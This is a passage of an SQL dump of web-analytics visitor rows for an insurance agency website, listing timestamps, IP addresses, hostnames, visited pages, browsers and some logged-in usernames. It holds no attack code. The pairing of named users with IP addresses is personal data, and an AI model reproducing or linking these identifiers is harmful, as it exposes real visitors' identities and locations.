9','','','','','','','','0','0',0),(5931,'0b_df03c59c8cf2d03a4b5d5b1764816a91','1458227087','69.175.67.58','newscan04.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5933,'0b_df03c59c8cf2d03a4b5d5b1764816a91','1458227103','69.175.67.58','newscan04.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5934,'0b_bea5d6ba1523017119559a8d62ad103f','1458227677','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5937,'0b_8848771474ecfc1e5753189c905cd184','1458228951','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5940,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229037','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5942,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229111','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5943,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229112','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5945,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229115','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5946,'0b_e2175335007017ec0290a6231dde8981','1458229131','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(5949,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229188','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5951,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229189','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5952,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5955,'0b_e2175335007017ec0290a6231dde8981','1458229230','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','51',0),(5957,'0b_e2175335007017ec0290a6231dde8981','1458229231','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','0',0),(5960,'0b_e2175335007017ec0290a6231dde8981','1458229234','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','51',0),(5961,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229320','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5963,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229321','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5964,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229325','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5966,'0b_b99de344bf51ec121f7d19eba7beb048','1458229365','54.229.174.179','ec2-54-229-174-179.eu-west-1.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0','http://EMPIREINS.COM','',0,'Win10 x64','Firefox 44','us','','','','','','','2','0',0),(5967,'0b_9656068784b607479820c415a93fd933','1458229365','54.229.174.179','ec2-54-229-174-179.eu-west-1.compute.amazonaws.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36','http://EMPIREINS.COM','',0,'Win10','Chrome 48','us','','','','','','','2','0',0),(5969,'0b_ea98c6a63366605acf9399cdc7b9ba94','1458229486','179.43.159.242','179.43.159.242','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinVista x64','Firefox 16','ua','','','','','','','0','0',0),(5970,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229595','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5973,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229596','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5976,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458229602','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5978,'0b_43ce467e42b2d5c3a1db720db10b4a5d','1458230439','66.249.83.217,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(5979,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458230851','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5982,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458230852','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5985,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458230858','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5987,'0b_e2175335007017ec0290a6231dde8981','1458230878','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','51',0),(5988,'0b_e2175335007017ec0290a6231dde8981','1458230902','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','51',0),(5991,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458230974','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5994,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458230974','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5996,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458230976','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5999,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458230981','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(6000,'0b_1850c706a111336953237ae64b503f6f','1458231597','67.81.56.252','ool-435138fc.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(6002,'0b_1850c706a111336953237ae64b503f6f','1458231599','67.81.56.252','ool-435138fc.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(6003,'0b_1850c706a111336953237ae64b503f6f','1458231604','67.81.56.252','ool-435138fc.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(6006,'0b_1850c706a111336953237ae64b503f6f','1458231621','67.81.56.252','ool-435138fc.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(6009,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232317','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6011,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232328','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6012,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232342','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6015,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232360','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(6017,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232606','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(6020,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232607','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6021,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232612','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(6023,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232630','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(6026,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232932','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6029,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458232943','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6030,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458233313','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6033,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458233324','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6036,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458233338','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(6039,'0b_ea2b5c774a4ad06162f38d6c5de36125','1458233355','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(6041,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458233700','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(6042,'0b_a3800fa9e2251de4402028c0261db43a','1458235227','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/forms','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6044,'0b_f83e19b6b624fdcc3003af08d1d7b726','1458235412','71.189.164.218','static-71-189-164-218.lsanca.fios.verizon.net','/robots.txt','\\\'Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +http://gimmeusa.com/crawler.html)\\\'','','',0,'','','us','','','GimmeUSAbot','','','','0','0',0),(6047,'0b_a3800fa9e2251de4402028c0261db43a','1458235423','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/forms/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(6050,'0b_3362326218a3da19b1ab89b740d83e54','1458235922','69.115.129.0','ool-45738100.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://search.aol.com/aol/search?s_chn=prt_main5&v_t=comsearch&page=4&q=does+companion+life+in+co+of+ny+have+a+chronic+illness+Insurance++rider&s_it=topsearchbox.search&oreq=5703e5dcb7e04962a07d05a80cb9caf7','does companion life in co of ny have a chronic illness Insurance rider',4,'Win10','Chrome 49','us','','AOL','','','','','0','0',0),(6051,'0b_3362326218a3da19b1ab89b740d83e54','1458235925','69.115.129.0','ool-45738100.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','','','','','','','0','0',0),(6053,'0b_e75c22f57f7dc263045b9567f4dd77e5','1458238666','104.155.104.187','187.104.155.104.bc.googleusercontent.com','/','Python-urllib/2.7','','',0,'','','','','','Python-urllib','','','','0','0',0),(6054,'0b_2445c5c9f0e7f1aba258a2a68163e3aa','1458239420','157.55.39.192','msnbot-157-55-39-192.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(6056,'0b_28303cdd9b59625828b971e1db8bbb4e','1458239908','180.76.15.13','baiduspider-180-76-15-13.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(6057,'0b_68a2a0ed50a352ec621152298b7fd88a','1458240344','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(6059,'0b_68a2a0ed50a352ec621152298b7fd88a','1458240394','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(6060,'0b_b9cec3126675160672890fa18ca91bc1','1458240543','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6062,'0b_b9cec3126675160672890fa18ca91bc1','1458240545','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(6065,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458240806','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(6066,'0b_c35aefe6c82d25ae6f6980f9a84e95d4','1458240807','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(6069,'0b_2c416b8e7ba6d27ab5d3edb563dbd6fb','1458240903','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(6072,'0b_2c416b8e7ba6d27ab5d3edb563dbd6fb','1458240904','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(6075,'0b_d8ca09dfb06706fcbad4628611a3dfb0','1458240910','122.176.94.33','abts-north-static-033.94.176.122.airtelbroadband.in','/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36','','',0,'Linux','Chrome 42','in','','','','','','','0','0',0),(6077,'0b_d8ca09dfb06706fcbad4628611a3dfb0','1458240913','122.176.94.33','abts-north-static-033.94.176.122.airtelbroadband.in','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36','http://www.empireins.com/','',0,'Linux','Chrome 42','in','','','','','','','0','0',0),(6078,'0b_a175e636bfdb2a3f310e59cf419a9666','1458240929','4.79.123.3','4.79.123.3','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(6081,'0b_42142cd28152c02d9685e4c44396dcf1','1458241145','51.255.162.164','164.ip-51-255-162.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(6084,'0b_42142cd28152c02d9685e4c44396dcf1','1458241147','51.255.162.164','164.ip-51-255-162.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(6086,'0b_b290d13750c9d2710fd868030968d91e','1458242592','62.146.2.234','ipx62036.ipxserver.de','/robots.txt','Mozilla/5.0 (compatible; SEOlyticsCrawler/3.0; +http://crawler.seolytics.net/)','','',0,'','','de','','','Unknown Spider','','','','0','0',0),(6089,'0b_b290d13750c9d2710fd868030968d91e','1458242594','62.146.2.234','ipx62036.ipxserver.de','/','Mozilla/5.0 (compatible; SEOlyticsCrawler/3.0; +http://crawler.seolytics.net/)','','',0,'','','de','','','','','','','0','0',0),(6090,'0b_f4bc34964d8338aaff107145a8e10b4f','1458242828','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(6092,'0b_f4bc34964d8338aaff107145a8e10b4f','1458242830','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(6093,'0b_f4bc34964d8338aaff107145a8e10b4f','1458242855','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','0',0),(6096,'0b_f4bc34964d8338aaff107145a8e10b4f','1458243047','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(6099,'0b_f4bc34964d8338aaff107145a8e10b4f','1458243287','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1280 x 1024','','','','','','0','51',0),(6101,'0b_fe4edd94b8568c48d0e19f5385766192','1458243587','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','[404] /favicon.gif','Mozilla/4.0 (compatible; GoogleToolbar 7.5.7210.1528; Windows 6.1; MSIE 9.0.8112.16421)','','',0,'','Netscape 4','','','','','','','','0','0',0),(6102,'0b_7fb5b931026926a539bf8cf6fa477e8e','1458243770','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/user-edit.php?user_id=201','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','3','0',0),(6104,'0b_9ad6bd333ec67224597045402d82af33','1458244333','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(6107,'0b_68a2a0ed50a352ec621152298b7fd88a','1458244528','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(6110,'0b_68a2a0ed50a352ec621152298b7fd88a','1458244532','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(6111,'0b_5cc18fdb5e3076e2c3c3b391da8266a6','1458244992','23.239.224.1','23.239.224.1','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like 